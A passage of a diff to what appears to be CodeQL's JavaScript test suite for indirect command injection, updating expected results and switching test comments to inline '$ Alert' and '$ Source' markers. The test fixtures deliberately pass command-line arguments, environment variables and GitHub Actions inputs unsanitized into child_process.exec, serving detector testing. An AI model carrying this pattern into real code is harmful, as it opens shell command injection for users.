rgs")() | command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | command-line argument | +| command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line argument | +| command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | command-line argument | +| command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line argument | +| command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line argument | +| command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line argument | +| command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line argument | +| command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | command-line argument | +| command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line argument | +| command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line argument | +| command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line argument | +| command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line argument | +| command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line argument | +| command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line argument | +| command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line argument | +| command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line argument | +| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line argument | +| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line argument | +| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:133:10:133:16 | program | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:133:10:133:16 | program | command-line argument | +| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line argument | +| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line argument | +| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line argument | +| command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line argument | edges | actions.js:4:6:4:16 | process.env | actions.js:4:6:4:29 | process ... _DATA'] | provenance | | | actions.js:7:15:7:15 | e | actions.js:8:10:8:10 | e | provenance | | @@ -290,44 +331,3 @@ nodes | command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | semmle.label | "cmd.sh ... zzaType | | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | semmle.label | program.pizzaType | subpaths -#select -| actions.js:4:6:4:29 | process ... _DATA'] | actions.js:4:6:4:16 | process.env | actions.js:4:6:4:29 | process ... _DATA'] | This command depends on an unsanitized $@. | actions.js:4:6:4:16 | process.env | environment variable | -| actions.js:8:10:8:23 | e['TEST_DATA'] | actions.js:12:6:12:16 | process.env | actions.js:8:10:8:23 | e['TEST_DATA'] | This command depends on an unsanitized $@. | actions.js:12:6:12:16 | process.env | environment variable | -| actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | This command depends on an unsanitized $@. | actions.js:14:6:14:21 | getInput('data') | GitHub Actions user input | -| command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:11:14:11:20 | args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:11:14:11:20 | args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:19:14:19:17 | arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:19:14:19:17 | arg0 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | command-line argument | -| command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line argument | -| command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | command-line argument | -| command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line argument | -| command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line argument | -| command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line argument | -| command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line argument | -| command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | command-line argument | -| command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line argument | -| command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line argument | -| command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line argument | -| command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line argument | -| command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line argument | -| command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line argument | -| command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line argument | -| command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line argument | -| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line argument | -| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line argument | -| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:133:10:133:16 | program | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:133:10:133:16 | program | command-line argument | -| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line argument | -| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line argument | -| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line argument | -| command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line argument | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref index 2911d45d2dac..4367c17e03ee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref @@ -1 +1,2 @@ -Security/CWE-078/IndirectCommandInjection.ql \ No newline at end of file +query: Security/CWE-078/IndirectCommandInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js index 7a8f6982f178..021715395217 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js @@ -1,14 +1,14 @@ import { exec } from "@actions/exec"; import { getInput } from "@actions/core"; -exec(process.env['TEST_DATA']); // NOT OK -exec(process.env['GITHUB_ACTION']); // OK +exec(process.env['TEST_DATA']); // $ Alert +exec(process.env['GITHUB_ACTION']); function test(e) { - exec(e['TEST_DATA']); // NOT OK - exec(e['GITHUB_ACTION']); // OK + exec(e['TEST_DATA']); // $ Alert + exec(e['GITHUB_ACTION']); } -test(process.env); +test(process.env); // $ Source -exec(getInput('data')); // NOT OK +exec(getInput('data')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js index 17b8b6c9c25e..fe5142a0b3c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js @@ -1,95 +1,95 @@ var cp = require("child_process"); (function() { - cp.exec(process.argv); // NOT OK (just weird) - cp.exec(process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[1]); // OK - cp.exec("cmd.sh " + process.argv[2]); // NOT OK + cp.exec(process.argv); // $ Alert - just weird + cp.exec(process.argv[0]); + cp.exec("cmd.sh " + process.argv[0]); + cp.exec("cmd.sh " + process.argv[1]); + cp.exec("cmd.sh " + process.argv[2]); // $ Alert - var args = process.argv.slice(2); - cp.execSync(args[0]); // NOT OK - cp.execSync("cmd.sh " + args[0]); // NOT OK + var args = process.argv.slice(2); // $ Source + cp.execSync(args[0]); // $ Alert + cp.execSync("cmd.sh " + args[0]); // $ Alert var fewerArgs = args.slice(1); - cp.execSync(fewerArgs[0]); // NOT OK - cp.execSync("cmd.sh " + fewerArgs[0]); // NOT OK + cp.execSync(fewerArgs[0]); // $ Alert + cp.execSync("cmd.sh " + fewerArgs[0]); // $ Alert var arg0 = fewerArgs[0]; - cp.execSync(arg0); // NOT OK - cp.execSync("cmd.sh " + arg0); // NOT OK + cp.execSync(arg0); // $ Alert + cp.execSync("cmd.sh " + arg0); // $ Alert }); (function() { - const args = process.argv.slice(2); + const args = process.argv.slice(2); // $ Source const script = path.join(packageDir, 'app', 'index.js'); - cp.execSync(`node ${script} ${args[0]} --option"`); // NOT OK - cp.execSync(`node ${script} ${args.join(' ')} --option"`); // NOT OK + cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert + cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert }); -cp.exec("cmd.sh " + require("get-them-args")().foo); // NOT OK +cp.exec("cmd.sh " + require("get-them-args")().foo); // $ Alert cp.exec("cmd.sh " + require("minimist")().foo); // OK - no args provided. -cp.exec("cmd.sh " + require("yargs").argv.foo); // NOT OK -cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK +cp.exec("cmd.sh " + require("yargs").argv.foo); // $ Alert +cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { var args = require('yargs') // eslint-disable-line .command('serve [port]', 'start the server', (yargs) => { }) .option('verbose', { foo: "bar" }) - .argv + .argv // $ Source - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert - cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // NOT OK + cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // $ Alert }); (function () { const { argv: { ...args - }, + }, // $ Source } = require('yargs') .usage('Usage: foo bar') .command(); - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert - var tainted1 = require('yargs').argv; - var tainted2 = require('yargs').parse() + var tainted1 = require('yargs').argv; // $ Source + var tainted2 = require('yargs').parse() // $ Source const {taint1: {...taint1rest},taint2: {...taint2rest}} = { taint1: tainted1, taint2: tainted2 } - cp.exec("cmd.sh " + taint1rest); // NOT OK - has flow from tainted1 - cp.exec("cmd.sh " + taint2rest); // NOT OK - has flow from tianted2 + cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1 + cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2 - var {...taint3} = require('yargs').argv; - cp.exec("cmd.sh " + taint3); // NOT OK + var {...taint3} = require('yargs').argv; // $ Source + cp.exec("cmd.sh " + taint3); // $ Alert - var [...taint4] = require('yargs').argv; - cp.exec("cmd.sh " + taint4); // NOT OK + var [...taint4] = require('yargs').argv; // $ Source + cp.exec("cmd.sh " + taint4); // $ Alert }); (function () { - const argv = process.argv.slice(2); + const argv = process.argv.slice(2); // $ Source var minimist = require("minimist"); - cp.exec("cmd.sh " + minimist(argv).foo); // NOT OK + cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert var subarg = require('subarg'); - cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // $ Alert var yargsParser = require('yargs-parser'); - cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert import args from 'args' - var flags = args.parse(process.argv); - cp.exec("cmd.sh " + flags.foo); // NOT OK + var flags = args.parse(process.argv); // $ Source + cp.exec("cmd.sh " + flags.foo); // $ Alert - var flags = require('arg')({...spec}); - cp.exec("cmd.sh " + flags.foo); // NOT OK + var flags = require('arg')({...spec}); // $ Source + cp.exec("cmd.sh " + flags.foo); // $ Alert }) (function () { @@ -99,42 +99,42 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK parser.add_argument('-f', '--foo', { help: 'foo bar' }); - cp.exec("cmd.sh " + parser.parse_args().foo); // NOT OK + cp.exec("cmd.sh " + parser.parse_args().foo); // $ Alert }); (function () { const commandLineArgs = require('command-line-args'); - const options = commandLineArgs(optionDefinitions); - cp.exec("cmd.sh " + options.foo); // NOT OK + const options = commandLineArgs(optionDefinitions); // $ Source + cp.exec("cmd.sh " + options.foo); // $ Alert }); (function () { const meow = require('meow'); - const cli = meow(`helpstring`, {flags: {...flags}}); + const cli = meow(`helpstring`, {flags: {...flags}}); // $ Source - cp.exec("cmd.sh " + cli.input[0]); // NOT OK + cp.exec("cmd.sh " + cli.input[0]); // $ Alert }); (function () { var dashdash = require('dashdash'); - var opts = dashdash.parse({options: options}); + var opts = dashdash.parse({options: options}); // $ Source - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert var parser = dashdash.createParser({options: options}); - var opts = parser.parse(); + var opts = parser.parse(); // $ Source - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert }); (function () { - const { program } = require('commander'); + const { program } = require('commander'); // $ Source program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert }); (function () { @@ -142,8 +142,8 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK const program = new 